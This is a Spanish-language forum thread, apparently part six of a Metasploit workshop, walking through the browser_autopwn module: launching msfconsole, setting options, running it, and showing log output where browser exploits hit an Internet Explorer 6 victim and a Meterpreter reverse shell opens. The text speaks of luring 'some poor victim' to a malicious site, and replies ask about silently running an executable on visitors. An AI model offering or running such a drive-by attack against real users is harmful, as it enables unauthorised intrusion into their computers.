+Temario
-+Modulo browser_autopwn
-+¿Como funciona?
-+Instalacion
-+Comando show options
-+Configurando browser_autopwn
-+Obteniendo sessions
-+Conclusion
  • Bueno este taller a sido muy interesante y bueno ya les
    enseñe algunso truquillos con el metasploit y bueno
    asi hay mucho smas y bueno ahora veremos otra forma
    de introducirnos en una pc y como lo haremos ?
    pues bueno ahora utilizaremos un modulo de
    metasploit creado por desarrolladores de metasploit
    egipcios jejejej
+Modulo browser_autopwn
  • Bueno estes es el modulo que utilizaremos esta vez muy efectivo por cierto
+¿Como funciona?
  • Sencillo navega y toma fingerprints antesde lanzar exploits a la victima!
    Por tanto si la victima usa mozilla no se podra explotar EI7
    ayudandonos mucho a reducir tiempo y exploits utilizables en
    la victima.
+Instalacion
  • La instalacion de este modulo que nos ofrecen los
    desarroladores de metasploit es muy sencilla.
    Primero lanzamos nuestro metasploit ya saben

Código: Seleccionar todo

sudo ./msfconsole
  • Y bueno ahora lo que tenemos qu ehacer es llamarlo y lo hacemos de esta forma!

Código: Seleccionar todo

msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > 

+Comando show options

  • Bueno ya lo llamamos ahora lanzamos el comando show options para ver que hay que configurar

Código: Seleccionar todo

msf auxiliary(browser_autopwn) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST                        yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

msf auxiliary(browser_autopwn) > 
+Configurando browser_autopwn

Código: Seleccionar todo

msf auxiliary(browser_autopwn) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn) > 
  • Esto es basicamente lo que hay que configurar
    LHOST: la ip que vamos a escanear
    y
    URIPATH: aqui pones /

    y listo podemos correr nuestro scanner
    jejejej
    veamos
+Corriendo browser_autopwn

Código: Seleccionar todo

msf auxiliary(browser_autopwn) > run
[*] Auxiliary module running as background job
msf auxiliary(browser_autopwn) >

[*] Starting exploit modules on host 192.168.1.102...
[*] ---
...snip...
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/zCtg7oC
[*]  Local IP: http://192.168.1.102:8080/zCtg7oC
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/vTNGJx
[*]  Local IP: http://192.168.1.102:8080/vTNGJx
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/abmR33jxStsF7
[*]  Local IP: http://192.168.1.102:8080/abmR33jxStsF7
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
...snip...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/RdDDhKANpV
[*] Local IP: http://192.168.1.102:8080/RdDDhKANpV
[*] Server started.

[*] --- Done, found 11 exploit modules

[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.102:8080/
[*] Server started.

Now all we need to do is get some poor victim to navigate to our malicious website and when they do, Browser Autopwn will target their browser based 
on its version.

[*] Request '/' from 192.168.1.128:1767
[*] Request '/?sessid=V2luZG93czpYUDp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ni4wO1NQMjo=' from 192.168.1.128:1767
[*] JavaScript Report: Windows:XP:undefined:en-us:x86:MSIE:6.0;SP2:
[*] No database, using targetcache instead
[*] Responding with exploits
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.1.128:1774...
[*] Sending Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability to 192.168.1.128:1775...
[*] Sending Microsoft Internet Explorer Data Binding Memory Corruption init HTML to 192.168.1.128:1774...
[*] Sending EXE payload to 192.168.1.128:1775...
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:62360 -> 192.168.1.128:1798)
msf auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.102:62360 -> 192.168.1.108:1798

  • Y listo tenemos sessions
+Obteniendo sessions

Código: Seleccionar todo

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
+Conclusion

  • Bueno ahora ya tenemos mas metodos de intrucion en un
    sistema interesante todo lo que ofrece metasploit no?¡??
    Saludos esperen la parte VII !
¡En el pen-testing el eslabon mas debil es el usuario!
Muy muy Interesante!!!

Pero, esto solo funciona con IE, o también con otros navegadores??
Y con todas las versiones de IE, o solo con algunas??

Saludos!!
github.com/Slek-Z
Obvio si funciona con firefox mas con IE y claro en todas sus versiones funciona!!!!
¡En el pen-testing el eslabon mas debil es el usuario!
te vas superando shiva! , esta de lujo el taller, esperando la parte VII

saludos
http://osx-soft.blogspot.com
Pero con esto se puede hacer una web que ejecute un exe nada mas visitarla o no? Porque el metaspoit es en mi pc :S
¡Atención! LuisN2.com ha caido, pero el blog sigue estando en www.luisn2indetectables.blogspot.com o www.LuisN2.cz.cc
Luis si quieres un respuesta mejora tu sintaxis por que no entendi nada de lo que pusiste
¡En el pen-testing el eslabon mas debil es el usuario!
Que si se puede hacer un exploit web.

Tu entras a la web y ejecuta un exe ocultamente!
¡Atención! LuisN2.com ha caido, pero el blog sigue estando en www.luisn2indetectables.blogspot.com o www.LuisN2.cz.cc
Sigues de necio .... Que sigas el taller esa actitud es de script kiddie nada mas quieres sabe una cosa y ya y te cierras y eres terco asi no y ademas sige el taller eso plantealo en la seccion de dudads y preguntas no me vengas con esas cosas de haz me un exploit pequeño bebe y tambien te cambio el pañl jijijijij
¡En el pen-testing el eslabon mas debil es el usuario!
A ver solo digo si se podria con esa info, no te digo que me hagas uno ni me expliques, además me he leido el tutorial!!!! Y el metasploit se hace en mi pc, no en la web!

Saludos!
¡Atención! LuisN2.com ha caido, pero el blog sigue estando en www.luisn2indetectables.blogspot.com o www.LuisN2.cz.cc
Responder

Volver a “General”